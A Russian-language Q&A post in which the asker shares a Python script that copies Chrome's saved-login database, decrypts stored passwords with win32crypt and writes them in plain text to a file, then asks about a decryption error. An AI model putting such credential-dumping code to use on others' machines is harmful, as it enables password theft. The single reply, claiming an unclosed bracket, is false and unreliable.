# Как подключить win32crypt? Или в чем проблема?

Tags: python

Ввожу код

```
def Chrome(): 
   text = 'Passwords Chrome:' + '\n' 
   text += 'URL | LOGIN | PASSWORD' + '\n' 
   if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data'): # Ищем файл Login Data В котором содержатся все пароли
       shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data', os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data2')

       conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data2') # Начинаем работать с sqlite базой
       cursor = conn.cursor()
       cursor.execute('SELECT action_url, username_value, password_value FROM logins') 
       for result in cursor.fetchall():
           password = win32crypt.CryptUnprotectData(result[2])[1].decode() 
           login = result[1]
           url = result[0]
           if password != '':
               text += url + ' | ' + login + ' | ' + password + '\n'
   return text
file = open(os.getenv("APPDATA") + '\\google_pass.txt', "w+") #Сохраняем данныем в txt файл google_pass
file.write(str(Chrome()) + '\n')
file.close()
```

На что мне питон ругается и говорит

```
Traceback (most recent call last):
  File "my.py", line 35, in <module>
    file.write(str(Chrome()) + '\n')
  File "my.py", line 28, in Chrome
    password = win32crypt.CryptUnprotectData(result[2])[1].decode() # расшифровываем данные
pywintypes.error: (87, 'CryptProtectData', 'Параметр задан неверно.')
```

Answer (score 0):

в строке

```
password = win32crypt.CryptUnprotectData(result[2])[1].decode()
```

не закрыта скобка